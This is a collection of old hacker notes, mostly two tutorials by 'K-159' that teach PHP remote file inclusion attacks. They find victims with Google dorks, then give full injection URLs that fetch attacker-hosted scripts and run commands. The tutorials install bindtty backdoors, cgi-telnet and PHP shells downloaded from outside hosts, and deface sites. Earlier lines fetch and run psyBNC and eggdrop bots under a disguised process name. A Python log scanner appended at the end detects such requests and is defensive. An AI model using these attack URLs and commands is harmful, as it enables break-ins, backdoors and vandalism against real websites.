= [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
= [root@redeye samba]# /etc/init.d/smb start
=======================
=======
VHOST
= edit httpd.conf
= just add the entry in named.conf
= 1.
wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz
= 2. tar zxvf apache_1.3.27.tar.gz
= 3. cd apache_1.3.27
= 4. ./configure
= 5. make
= 6. make install
= 7. /usr/local/apache/bin/apachectl start
= cd /usr/local/apache/conf
= example:
= echo "" > httpd.conf
= echo "ServerName www.Cmaster4.net" >> httpd.conf
= echo "DocumentRoot /home/iptek/public_html" >> httpd.conf
= echo "ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin" >> httpd.conf
= echo "" >> httpd.conf
= ------------------------------
= ------------------------------
= ------------------------------
= find |grep name.conf
= echo "zone \"i-am.Cmaster4.net\" IN {" > named.conf
= echo "type master;" >> named.conf
= echo "file \"/var/named/named.local\";" >> named.conf
= echo "allow-update { none; };" >> named.conf
= echo "};" >> named.conf
= after that, restart named and httpd:
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= or
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= or, if it is not in /etc/init.d/, try typing find |grep named and then find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make;
wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh;
wget http://www.geocities.com/lifron/kik; chmod +x kik;
./kik "/usr/sbin/httpd -DHAVE_PROXY -DHAVE" ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1. install bindtty
2.
if bindtty does not run, install shell.php
3. if that does not work either, try cgi-telnet
for example http://livron.port5.com/mail.php <--------- this is the shell source
e.g.: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php
if that fails, we look for a folder that the wwwrun uid can wget into
if it works... open: http://www.target.org/modules/My_eGallery/public/mail.php
========
install bindtty
wget www.geocities.com/lifron/bindtty -O /tmp/httpd
this puts the wget result in the /tmp folder under the filename httpd
then make the file executable:
chmod 755 /tmp/httpd
============
cgi-telnet
find the cgi-bin folder >> that is where we put cgi-telnet
usually the cgi-bin folder is under .../www, but on most web servers each user is given their own cgi-bin folder
example:
/home/users/russisk/html/modules/My_eGallery/public <------ earlier we were in this folder
http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk
the cgi-bin is visible; cd into the cgi-bin folder, then wget into it
Example:
wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl
if that works, continue with
chmod 755 /home/users/russisk/cgi-bin/cgi.pl <------- so that cgi.pl becomes an executable file
if it works, just open: www.target.org/cgi-bin/cgi.pl port 7788
============
end
wget www.geocities.com/lifron/psy.tar.gz; tar -zvxf psy.tar.gz
cd .psy
./config KuNTuA 6669
./fuck
./run
===========
Title     : SUPER KIDDIES HACKING: "PHP SUPER BUGS"
Author    : K-159
Greetz    : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Channel   : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email     : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
---------------------------------------------------------------------------------------------------------
Prolog :
I wrote this tutorial just for my dearest brother "Lieur-Euy". Thanks for all the best friendship, spirit, motivation, kindness, jokes, and all the time that we spend together. Just wait till I have finished my homework, and we will rock the world again :)

1. allinurl filename bugs
Targets for the filename bug can be found with the keyword "allinurl:*.php?filename=*". The keyword '*.php' can be replaced with anything, for example index.php, so the keyword we enter into Google is "allinurl:index.php?filename=*". After finding a target, build the URL like this:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

2. allinurl content bugs
Targets for the content bug can be found with the keyword "allinurl:*.php?content=". The keyword '*.php' can be replaced with any file, for example index.php, so the keyword we enter into Google is "allinurl:index.php?content=". After finding a target, build the URL like this:
" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

3. allinurl page bugs
Targets for the page bug can be found with the keyword "allinurl:*.php?page=*". '*.php' can be replaced with any file, for example index.php, so the keyword we enter into Google is "allinurl:index.php?page=".
After getting a target, build the URL like this:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

4. allinurl link bugs
Targets for this bug can be found with the keyword "allinurl:*.php?link=*". The keyword '*.php' can be replaced with any file, for example index.php, so the keyword we enter in Google is "allinurl:index.php?link=*". After getting a target, build the URL like this:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

5. allinurl file bugs
Targets for this file bug can be found with the keyword "allinurl:*.php?file=*". '*.php' can be replaced with any file, for example index.php, so the keyword we enter in Google is "allinurl:index.php?file=*". After getting a target, build the URL like this:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
We can also try other targets with the keywords base.php, page.php, content.php, view.php, imageview.php, modules.php, etc.

After getting a vulnerable target there are several things we can do:

I. Install bindtty telnet
1. Build a URL like this:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "
The URL above wgets bindtty telnet to the target server and stores the result in the /tmp folder under the file name httpd.
2. Then turn the httpd file in the /tmp folder into an executable file:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd "
3. Execute the httpd file:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd "
4. Open telnet to the target IP on the bindtty port.

II. Install cgi-telnet
1. Build a URL like this:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "
The URL above wgets the cgi-telnet test.pl to the target server and stores the result in the /var/www/cgi-bin folder under the file name test.pl. Adjust this to the location of the cgi-bin folder on that server when saving the wget result.
2. Make the cgi-telnet test.pl an executable file:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl "
3. Access our cgi-telnet by opening the URL:
" http://www.target.com/cgi-bin/test.pl "
Enter the password "n0fr13".

III. Install a PHP shell
1. Build a URL like this:
" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php "
The URL above wgets to the target server, and the result is the file log.php. If the message "permission denied" appears, look for another folder where our shell.php can be saved with wget.
2. Access our PHP shell according to its folder:
" http://www.target.com/target/log.php "

IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo "K-159 and crew was touch your system" > test.html

That's all, my friends. Just try it !!!
Denpasar, 15 January 2004
K-159

Epilog : special thanks to my beloved sister "May" for all the spirit, motivation, love, kindness, and all the fire that you give to me. "I love you my dear sister, in the name of Allah."

Further reading:
--------------------
www.geocities.com/emilroni/hackurl.txt
www.geocities.com/emilroni/google.txt

=======================
=========================================================================================
Title : SUPER KIDDIES HACKING "Super Bugs PHP II"
Author : K-159
Greetz : KuNTuA, Lieur-Euy, pe_es.
Reference : google.com, membres.lycos.fr, security-corporations.com, security-challenge.com
==========================================================================================

Proof of Concept :
==================
A URL handling flaw in the fopen() function lets an attacker inject a script into the target server.

Target :
========
Find targets on Google with the keywords:
1. allinurl:*.php?page=*
2. allinurl:*.php?content=*
3. allinurl:*.php?file=*
4. allinurl:*.php?filename=*
5. allinurl:*.php?link=*
6. allinurl:*.php?view=*
7. allinurl:*.php?sec=*
8. allinurl:*.php?document=*
9. allinurl:*.php?p=*
10. allinurl:*.php?x=*

Exploit:
=========
1. http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt
2. http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt
3. http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt
4. http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt
5. http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt
6. http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt
7. http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt
8. http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/document.txt
9. http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt
10. http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt

Exploit details:
===============
Upload a file : upload a file to the target server
Explore with fopen() function : find files that contain fopen on the target server
Execute arbitrary PHP functions : create a PHP script on the target server
Execute a system() command : run unix/linux commands on the target server
Manager for SQL Server : change the settings of the target's SQL server database
System overviewer (get the root !) : inspect the target server's system and do a local root

Denpasar, 28 February 2004
K-159

Further reading :
=====================
http://www.hackinthebox.org/article.php?sid=6899
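The two tutorials above describe the same pattern from the attacker's side: an include-style parameter (page, content, file, filename, link, basepath, ...) carrying a remote URL, usually paired with a cmd parameter. From the defender's side that pattern is easy to pick out of a web server access log. The following is an added example, not code from the original text; the log lines are constructed samples and attacker.example is a placeholder host.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" log format; only the client IP and request URL are used here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# A parameter value that would make include()/fopen() fetch code from another host.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample log, not real traffic (attacker.example is a placeholder).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Jan/2004:10:21:07 +0800] "GET /target/index.php?filename=http://attacker.example/injex.txt?&cmd=wget%20http://attacker.example/bind1%20-O%20/tmp/httpd HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [15/Jan/2004:10:21:19 +0800] "GET /target/index.php?filename=http://attacker.example/injex.txt?&cmd=chmod%20755%20/tmp/httpd HTTP/1.0" 200 120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [15/Jan/2004:10:22:01 +0800] "GET /target/index.php?page=about HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jan/2004:10:22:40 +0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/suntik.txt?&cmd=ls%20-al HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

def classify_request(url):
    """Return the findings for one request URL; an empty list means it looks clean."""
    findings = []
    query = urlsplit(url).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)  # second decode catches double-encoded values
            if REMOTE_RE.match(value):
                findings.append(f"remote URL in parameter '{name}'")
            if name == "cmd":
                findings.append(f"command parameter: {value!r}")
    return findings

def scan_log(lines):
    """Return (ip, url, findings) for every request that looks like an RFI attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings = classify_request(m.group("url"))
            if findings:
                hits.append((m.group("ip"), m.group("url"), findings))
    return hits

if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        print(ip, url, "->", "; ".join(findings))
```

The legitimate request with page=about produces no finding, while the three injection attempts are flagged together with the decoded command they carried.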